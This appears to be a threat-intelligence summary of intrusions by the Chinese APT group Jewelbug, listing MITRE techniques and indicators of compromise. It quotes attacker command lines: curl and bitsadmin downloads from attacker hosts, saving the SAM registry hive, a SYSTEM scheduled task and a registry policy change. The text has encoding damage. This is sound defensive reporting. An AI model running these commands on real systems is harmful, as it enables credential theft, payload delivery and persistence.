Chinese APT group Jewelbug (aka REF7707, CL-STA-0049, Earth Alux) has conducted sustained espionage-focused intrusions across South America, South Asia, Taiwan and Russia, targeting IT service providers, government networks and software companies to maintain stealthy persistence and potentially enable supply-chain attacks. The group reused legitimate cloud services and dual-use tools (notably Yandex Cloud, Microsoft Graph API/OneDrive, cdb.exe and DLL sideloading) and deployed custom backdoors including Finaldraft/Guidloader/Pathloader and a new OneDrive-based backdoor; #Jewelbug #Finaldraft
Keypoints
- Jewelbug has been highly active since mid-2023 and conducted recent multi-month intrusions in 2024â2025 across South America, South Asia, Taiwan and Russia.
- A Russian IT service provider was breached for five months in 2025, with access to code repositories and build systems that could enable supply-chain attacks against the providerâs customers.
- Attackers used legitimate services to remain stealthy, exfiltrating data to Yandex Cloud and naming a malicious sample âyandex2.exeâ to blend with typical Russian usage.
- On a South American government network, Jewelbug deployed a new backdoor under development that uses Microsoft Graph API and OneDrive for C2 and collects file lists, system metadata and logs activity to C:ProgramDataapplication.ini.
- Activity on a Taiwanese software company included DLL sideloading, ShadowPad deployment, BYOVD (EchoDrv) usage, credential dumping (Mimikatz/LSASS), scheduled tasks and tunneling tools, showing a broad toolkit of custom and public tools.
- Jewelbug consistently uses renamed cdb.exe (Console Debugger), living-off-the-land binaries, DLL sideloading and cloud-based C2 to minimize detection and maintain long-term persistence.
- Known custom malware families associated with the group include Finaldraft (aka Squidoor), Pathloader and Guidloader, which support in-memory encrypted shellcode execution and Microsoft Graph API-based C2.
MITRE Techniques
- [T1059 ] Command and Scripting Interpreter â Used to run commands and scripting on victim hosts (examples: âcurl https://app.blance.workers.dev/pngâ, âreg save HKLMSAM CSIDL_COMMON_PICTURESsam.hiveâ).
- [T1204 ] User Execution â Deployment of legitimate binaries and renamed tools (e.g., 7zup.exe as renamed cdb.exe) to execute payloads and bypass controls. Quote: âappearance of a file named 7zup.exe ⌠which is a renamed copy of cdb.exeâ
- [T1574 ] Hijack Execution Flow (DLL Sideloading) â Legitimate executables used for DLL sideloading (e.g., cyglaunch.exe, crclient.dll) to load malicious payloads. Quote: âused a legitimate executable for DLL sideloadingâ
- [T1218 ] Signed Binary Proxy Execution (Living off the Land) â Abuse of Microsoft-signed CDB (cdb.exe) to run shellcode, launch executables, run DLLs and terminate security solutions. Quote: âCDB can be used to run shellcode and bypass application whitelisting.â
- [T1005 ] Data from Local System â Collection of file lists and system metadata (IP, Windows version, hostname, machine identifier) and uploading to OneDrive. Quote: âObtains a list of files from targeted machines and uploads this to OneDriveâ
- [T1105 ] Ingress Tool Transfer â Downloading tools and payloads via curl and BITSAdmin (e.g., âbitsadmin /transfer myJob /download âŚâ, âcurl -k https://95.164.5.209/pngâ) to bring tools onto victim networks.
- [T1078 ] Valid Accounts â Attempts to add users and use legitimate remote management tools (AnyDesk) and scheduled tasks for persistence and remote access. Quote: âattempted to add a new user ⌠used the legitimate AnyDesk remote management softwareâ
- [T1112 ] Modify Registry â Registry edits to alter local policies (e.g., âREG ADD âHKLMSystemCurrentControlSetControlLsaâ /v DisableRestrictedAdmin /t REG_DWORD /d 00000000â).
- [T1056 ] Input Capture / Credential Dumping (LSASS/Mimikatz) â Use of LSASS dumping and Mimikatz to harvest credentials; command reference: âmimikatz.x64.exeâ.
- [T1497 ] Virtualization/Sandbox Evasion â Use of VM-related DLLs and tools (vmwarebase.dll, vmware-authd.exe) and manipulating outputs to ADMIN$ shares indicating attempts to hide or redirect execution artifacts.
- [T1537 ] Transfer Data to Cloud Account â Use of Microsoft Graph API and OneDrive for C2 and exfiltration, minimizing traditional network indicators. Quote: âleverages Microsoft Graph API and OneDrive as its command and control (C&C) servers.â
- [T1210 ] Exploitation of Remote Services / Web Shells â Prior reporting noted exploitation of IIS servers and deployment of webshells to gain initial access and persistence (described in Elastic and Palo Alto findings).
Indicators of Compromise
- [File hashes ] malicious and sideloading samples â yandex2.exe (3f49bd1f3b0999096511757e0fbc2e4e2c18176fd1773f71baf2d7a15dbbcfbf), mimikatz.x64.exe (bfe1538445e3f74ef7f41699482b40cf6f3b0a084e188f4c4b786b15eeb3601c).
- [File names ] renamed/dual-use binaries â 7zup.exe (renamed cdb.exe), yandex2.exe (used for exfiltration), cyglaunch.exe (used for DLL sideloading), crclient.dll.
- [Domains ] C2 and download hosts â app.blance.workers[.]dev (used for downloads/C2), cdn.kindylib[.]info (hosting observed in network indicators).
- [IP addresses ] direct download/exfil endpoints â 95.164.5[.]209 (used with curl for PNG/download), 34.117.217.74 (download host referenced in command lines).
- [Command lines ] persistence and exfiltration activity â examples: âschtasks /create ⌠/tn âMicrosoftWindowsApplicationDataappuriverifierinstallsâ /tr âCSIDL_SYSTEMoobesetup.exe uiâ /sc onstart /RU SYSTEMâ, âibitsadmin /transfer myJob /download ⌠https://www.microsoft.com/pt-br/ âŚâ.
Read more: https://www.security.com/threat-intelligence/jewelbug-apt-russia